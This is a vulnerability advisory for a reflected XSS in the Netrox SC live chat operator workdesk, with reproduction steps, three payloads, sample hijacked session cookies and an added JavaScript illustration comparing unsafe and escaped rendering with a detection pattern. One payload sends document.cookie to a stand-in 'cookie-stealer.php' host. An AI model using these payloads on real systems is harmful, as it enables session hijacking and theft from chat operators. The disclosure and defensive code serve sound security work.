/*!
* # Exploit Title: Netrox SC Live Chat Software for websites Reflected XSS Injection
* # Google Dork: -
* # Date: 2019/08/02
* # Author: m0ze
* # Vendor Homepage: https://www.netroxsc.com/ || https://www.netroxsc.ru/
* # Software Link: https://www.netroxsc.com/ || https://www.netroxsc.ru/ || https://sys.netrox.sc
* # Version: -
* # Tested on: NginX
* # CVE: -
* # CWE: CWE-79
*/
::- Details & Description -::
~ The «Netrox SC Live Chat Software for websites» web application is vulnerable to reflected XSS: the text a visitor is still typing (not yet sent) is rendered unescaped in the operator/admin workdesk. This lets an attacker inject JavaScript/HTML into the live chat with an authorized operator/admin, redirect the operator/admin to another website, or steal cookies and hijack an active admin/operator session.
::- Demo Website -::
~ Registration: https://sys.netrox.sc/signup
~ Frontend: https://www.netroxsc.com/ || https://www.netroxsc.ru/ || your own domain for test purposes
~ Backend (auth): https://sys.netrox.sc/enter
::- Special Note -::
~ To reproduce the described issue and install the demo chat, you need a domain and the ability to create an HTML page on it.
~ Keep in mind that your payload only works UNTIL you send it to the chat. In other words, keep the chat open IN A «TYPING» STATE; once the message is sent, the payload no longer fires.
::- PoC Links -::
~ -
::- PoC [Reflected XSS Injection via typing preview] -::
~ Step 1: Register a new account at https://sys.netrox.sc/signup and configure the chat/account settings.
~ Step 2: Go to https://sys.netrox.sc/t_site_theme_simple/show and press the «System code» button. Copy/paste the provided code into your demo website page (e.g. a blank index.html page) and save the changes; your demo website is now ready for testing.
~ Step 3: Open your demo website page with the «Netrox SC Live Chat» widget, open the chat and start typing your payload (check the examples below) but DON'T SEND THE MESSAGE.
~ Step 4: Go to the admin area https://sys.netrox.sc/t_workdesk and double-click the new chat alert. Wait ~3 seconds and your payload will fire in the operator/admin session.
~ Example #0: <h1 onmouseover=alert(`m0ze`);>m0ze</h1>
~ Example #1: <img src=x onerror=(alert)(document.cookie);window.location='https://twitter.com/m0ze_ru';//">
~ Example #2: <img src=x onerror=alert('OK');this.src='https://your.domain.tld/cookie-stealer.php?c='+document.cookie>
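~ Added illustration (not Netrox SC code; the advisory does not show the vendor's implementation, so the function names, the wrapper markup and the visitor IDs below are hypothetical): the workdesk bug class is a typing-preview string dropped into HTML context. The snippet renders the advisory's own payloads through an unsafe, concatenation-based preview and through an escaped one, then checks which tags from the visitor text survive, and adds a small server-side detector a defender could run over the typing events relayed to operators.

```javascript
// Added example, not vendor code. Names (escapeHtml, renderTypingPreview*,
// foreignTags, isSuspiciousTyping) and the wrapper <div> are assumptions.

// Constructed typing events: one benign, two taken from the advisory's payloads.
const SAMPLE_TYPING_EVENTS = [
  { visitor: 'v-1001', text: 'Hi, I need help with my order' },
  { visitor: 'v-1002', text: '<h1 onmouseover=alert(`m0ze`);>m0ze</h1>' },
  { visitor: 'v-1003',
    text: "<img src=x onerror=alert('OK');this.src='https://your.domain.tld/cookie-stealer.php?c='+document.cookie>" },
];

// Minimal HTML-context escaper: neutralises the five characters that can
// open a tag, close an attribute, or start an entity.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: visitor text is concatenated straight into markup.
// In a real workdesk this string would then be assigned to innerHTML.
function renderTypingPreviewUnsafe(ev) {
  return `<div class="typing" data-visitor="${ev.visitor}">${ev.text}</div>`;
}

// Hardened pattern: every visitor-controlled value is escaped first, so the
// text can only ever be rendered as text (textContent would be equivalent).
function renderTypingPreviewSafe(ev) {
  return `<div class="typing" data-visitor="${escapeHtml(ev.visitor)}">${escapeHtml(ev.text)}</div>`;
}

// Which opening tags in the rendered preview did not come from our wrapper?
// A correct renderer must return an empty list for any visitor input.
function foreignTags(html) {
  const names = [];
  for (const m of html.matchAll(/<([a-z][a-z0-9]*)\b/gi)) {
    const name = m[1].toLowerCase();
    if (name !== 'div') names.push(name);
  }
  return names;
}

// Defender-side detection for the relay that pushes typing events to the
// workdesk: flag text that contains a tag opener, an on*= handler or a
// javascript: URL so the event can be logged or alerted on.
function isSuspiciousTyping(text) {
  return /<[a-z!\/]/i.test(text) || /\bon[a-z]+\s*=/i.test(text) || /javascript:/i.test(text);
}

// Run every sample event through both renderers and the detector.
function report(events = SAMPLE_TYPING_EVENTS) {
  return events.map((ev) => ({
    visitor: ev.visitor,
    suspicious: isSuspiciousTyping(ev.text),
    unsafeLeaks: foreignTags(renderTypingPreviewUnsafe(ev)),
    safeLeaks: foreignTags(renderTypingPreviewSafe(ev)),
  }));
}

console.log(JSON.stringify(report(), null, 2));
```

~ The escaped renderer leaves no visitor tag alive for any of the three inputs, while the unsafe one leaks `h1` and `img` exactly as the advisory's Example #0 and #2 do. One caveat on impact: the session cookies shown below were obtained through `document.cookie`, so they are not flagged HttpOnly; adding HttpOnly would not fix the XSS but would take cookie theft off the table for this payload.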
::- PoC [Hijacked Session Cookies Sample] -::
NXSID=1q36j5aq6pzd408gha0bg8zn14;
auth_token=4eq848d1330m3efd6272301338db2588d2f7d4cnef5293213dc74d99ded7713b;